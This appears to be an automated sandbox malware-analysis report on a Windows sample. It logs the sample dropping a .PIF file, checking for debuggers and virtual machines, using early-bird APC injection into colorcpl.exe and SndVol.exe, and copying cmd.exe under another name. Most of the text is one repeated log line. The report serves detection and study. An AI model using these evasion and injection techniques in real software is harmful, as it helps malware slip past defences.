                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Delayed program exit found
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9F7E2 Sleep,ExitProcess,7_2_02F9F7E2
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0288F7E2 Sleep,ExitProcess,10_2_0288F7E2
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0300F7E2 Sleep,ExitProcess,12_2_0300F7E2
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,7_2_02FAA7D9
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,10_2_0289A7D9
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_0301A7D9
                    Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 5102Jump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 4405Jump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: foregroundWindowGot 1756Jump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFAPI coverage: 9.0 %
                    Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 5.9 %
                    Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 5.9 %
                    Source: C:\Windows\SysWOW64\colorcpl.exe TID: 3176Thread sleep count: 247 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exe TID: 3176Thread sleep time: -123500s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exe TID: 432Thread sleep count: 5102 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exe TID: 432Thread sleep time: -15306000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exe TID: 432Thread sleep count: 4405 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exe TID: 432Thread sleep time: -13215000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028F5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028F5908
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_02F9928E
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,7_2_02F9C388
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FAC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,7_2_02FAC322
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F996A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_02F996A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FA9B86 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_02FA9B86
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_02F9BB6B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FDE8F9 FindFirstFileExA,7_2_02FDE8F9
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F97877 FindFirstFileW,FindNextFileW,7_2_02F97877
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F98847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,7_2_02F98847
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_02F9BD72
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0288928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_0288928E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0288C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_2_0288C388
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0289C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_2_0289C322
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028896A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_028896A0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_02899B86 FindFirstFileW,FindNextFileW,FindNextFileW,10_2_02899B86
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0288BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0288BB6B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028CE8F9 FindFirstFileExA,10_2_028CE8F9
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_02888847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_2_02888847
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_02887877 FindFirstFileW,FindNextFileW,10_2_02887877
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0288BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0288BD72
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0301C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0301C322
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0300C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0300C388
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0300928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_0300928E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_030096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_030096A0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0300BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0300BB6B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_03019B86 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_03019B86
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_03008847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_03008847
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_03007877 FindFirstFileW,FindNextFileW,12_2_03007877
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0304E8F9 FindFirstFileExA,12_2_0304E8F9
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0300BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0300BD72
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F97CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,7_2_02F97CD2
                    Source: colorcpl.exe, 00000007.00000002.4510209869.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2139804062.00000000007AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx
                    Source: XjPA2pnUhC.exe, 00000000.00000002.2116974207.00000000005F0000.00000004.00000020.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2116974207.0000000000608000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4510209869.00000000007AA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2139804062.00000000007AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Qzzgbhha.PIF, 00000009.00000002.2229660285.0000000000791000.00000004.00000020.00020000.00000000.sdmp, Qzzgbhha.PIF, 0000000B.00000002.2306738847.0000000000696000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeAPI call chain: ExitProcess graph end nodegraph_0-77458
                    Source: C:\Windows\SysWOW64\colorcpl.exeAPI call chain: ExitProcess graph end nodegraph_7-48754
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFAPI call chain: ExitProcess graph end node

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_0290F744
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess queried: DebugPortJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FC4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02FC4A8A
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_0290894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_0290894C
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029BA8E5 mov eax, dword ptr fs:[00000030h]0_2_029BA8E5
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FD3355 mov eax, dword ptr fs:[00000030h]7_2_02FD3355
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028C3355 mov eax, dword ptr fs:[00000030h]10_2_028C3355
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_03043355 mov eax, dword ptr fs:[00000030h]12_2_03043355
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FA20B2 GetProcessHeap,HeapFree,7_2_02FA20B2
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FC503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_02FC503C
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FC4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02FC4A8A
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FC4BD8 SetUnhandledExceptionFilter,7_2_02FC4BD8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FCBB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_02FCBB71
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028B503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_028B503C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028B4A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_028B4A8A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028B4BD8 SetUnhandledExceptionFilter,10_2_028B4BD8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028BBB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_028BBB71
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0303503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0303503C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0303BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0303BB71
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_03034BD8 SetUnhandledExceptionFilter,12_2_03034BD8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_03034A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_03034A8A

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Early bird code injection technique detected
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exeJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\SndVol.exeJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 2F90000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 2880000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 3000000 protect: page execute and read and writeJump to behavior
                    Drops or copies cmd.exe with a different name (likely to bypass HIPS)
